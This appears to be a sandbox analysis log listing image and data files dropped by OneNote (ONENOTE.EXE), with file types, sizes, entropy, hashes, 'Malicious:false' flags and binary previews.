                                                                                                                                                                                                              SSDEEP:6:RaWXwttYyfB3h1RRXUnfQrLa24XnFFBl/FKBm7NO7JRujlw//0lweI/Wy5O77RuZ:RaCwTYyf9/UfQrLwFFBtFQ6Wf/WyAe
                                                                                                                                                                                                              MD5:38D7036E9012C4F6D3EC347ACC1F1315
                                                                                                                                                                                                              SHA1:9CC3ACE045C65C06548E35E38D7A72C8A3ADBA52
                                                                                                                                                                                                              SHA-256:243E3CD2C5DCCA84D72F23466D7998808CB4D7D436E08480209ED0281ED135BE
                                                                                                                                                                                                              SHA-512:D2BFBBE7F9E2EBC9E5339EC72800863613CDFC03CCE89BD8D8FD260D0CDF67764ED87A5BE834EBB93939B9E41DA2C0830749242946584B8F8E8750FA8101A240
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_t.JZ...B.F.}d3..................?.....I...............................................................................................................h..........................................._......K..4)...'.............K..9.K..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 40 x 623, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1569
                                                                                                                                                                                                              Entropy (8bit):7.583832946136897
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
                                                                                                                                                                                                              MD5:07DB3F43DE7C1392C67802E74707DAA6
                                                                                                                                                                                                              SHA1:C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
                                                                                                                                                                                                              SHA-256:51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
                                                                                                                                                                                                              SHA-512:E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):47294
                                                                                                                                                                                                              Entropy (8bit):7.497888607667405
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
                                                                                                                                                                                                              MD5:7A450E086AD14BA7D89BA5DB3D3AE6C7
                                                                                                                                                                                                              SHA1:E7AEAFCFCE476390E18C19456BDF6529D863D518
                                                                                                                                                                                                              SHA-256:BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
                                                                                                                                                                                                              SHA-512:9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1|....[...jQ.%Zb.......t..........*..V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=*N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):55804
                                                                                                                                                                                                              Entropy (8bit):7.433623355028275
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                                                                                                                              MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                                                                                                                              SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                                                                                                                              SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                                                                                                                              SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40884
                                                                                                                                                                                                              Entropy (8bit):7.545929039957292
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                                                                                                                              MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                                                                                                                              SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                                                                                                                              SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                                                                                                                              SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6460602302247237
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Rab4FYyfB3h1RRXUnfcFoZFFBl/FKajmVjmYRujlw//0lweI/ujmARujd:RaeYyf9/UfcF6FFBtRaAWf/c4
                                                                                                                                                                                                              MD5:5A29809219C6919F9DD574DF499923E8
                                                                                                                                                                                                              SHA1:5719DDFF44637F02DD5EC1A6539BDA7A886CC0F0
                                                                                                                                                                                                              SHA-256:0B0173B671C6DEDBE90DD389CD6F56277E47DDE7D46D8CAE3DA38BF85B4B9E5F
                                                                                                                                                                                                              SHA-512:FFEEC0FD5ED1B01509520E8FAE7436C84A0FB5D52D0316E3DCA71696B91BB08E6E46FD0087EF72B75C29C6801574BA2B446A468270A7B922295DF72618C5EC35
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_.L."N:!C..E..0..................?.....I...............................................................................................................h.............................................Y.V".G...-8..........f._....E..X.NO6.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):52912
                                                                                                                                                                                                              Entropy (8bit):7.679147474806877
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
                                                                                                                                                                                                              MD5:1122BF4C2A42B4FA7F29D3C94954A7C9
                                                                                                                                                                                                              SHA1:3750077A830FE21735A43ABD35C63BA9A4D4B0DE
                                                                                                                                                                                                              SHA-256:423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
                                                                                                                                                                                                              SHA-512:4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=....*.......S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1717
                                                                                                                                                                                                              Entropy (8bit):7.154087739587035
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
                                                                                                                                                                                                              MD5:943371B39CA847674998535110462220
                                                                                                                                                                                                              SHA1:5CA79B7BD7E0E93271463FAEF3280F1644CBA073
                                                                                                                                                                                                              SHA-256:9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
                                                                                                                                                                                                              SHA-512:812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J*....Q...b.Q..Ah....Ah..b.Ah..b.PZ*.(.@z.?.`;2.......................................................Q...b.Q..EZ*.(..Z>.G.....`Z+E......J*....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32656
                                                                                                                                                                                                              Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                              MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                              SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                              SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                              SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):76485
                                                                                                                                                                                                              Entropy (8bit):7.79809544163696
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
                                                                                                                                                                                                              MD5:734BA03175EBC8B8E3EF57BC3DDC9D8E
                                                                                                                                                                                                              SHA1:1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
                                                                                                                                                                                                              SHA-256:275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
                                                                                                                                                                                                              SHA-512:23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......*......v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3428
                                                                                                                                                                                                              Entropy (8bit):7.766473352510893
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
                                                                                                                                                                                                              MD5:EE9E2DF458733B61333E8A82F7A2613D
                                                                                                                                                                                                              SHA1:A86704C969F51B86D6A05ED51C6C60214ED9FA89
                                                                                                                                                                                                              SHA-256:BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
                                                                                                                                                                                                              SHA-512:BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z*...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v...*.q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15740
                                                                                                                                                                                                              Entropy (8bit):6.0674556182683945
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                                                                                                                              MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                                                                                                                              SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                                                                                                                              SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                                                                                                                              SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2268
                                                                                                                                                                                                              Entropy (8bit):7.384274251000273
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
                                                                                                                                                                                                              MD5:09A7AE94AA8E517298A9618A13D6E0E2
                                                                                                                                                                                                              SHA1:FA5181A7414BA32F816BF0C4278EC20C615E8B1A
                                                                                                                                                                                                              SHA-256:3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
                                                                                                                                                                                                              SHA-512:074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)*..TT...."....T.Tc.**j..............j.z!*.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}*.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._..*_C.k..p9.p..O..vu...'........0v
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 40 x 617, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):827
                                                                                                                                                                                                              Entropy (8bit):7.23139555596658
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
                                                                                                                                                                                                              MD5:3E675D61F588462FB452342B14BCF9C0
                                                                                                                                                                                                              SHA1:86B62019BC3C5BE48B654256B5D10293FC8C842A
                                                                                                                                                                                                              SHA-256:639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
                                                                                                                                                                                                              SHA-512:E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.|.._...7..D..Ya.l.....{.@&.|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2266
                                                                                                                                                                                                              Entropy (8bit):5.563021222358941
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
                                                                                                                                                                                                              MD5:DB8A181E3F0EAD4A9472099E42ED6BE3
                                                                                                                                                                                                              SHA1:92096AF05CC6167B1AA816811A1160B809393FA2
                                                                                                                                                                                                              SHA-256:E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
                                                                                                                                                                                                              SHA-512:A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
                                                                                                                                                                                                              Malicious:false
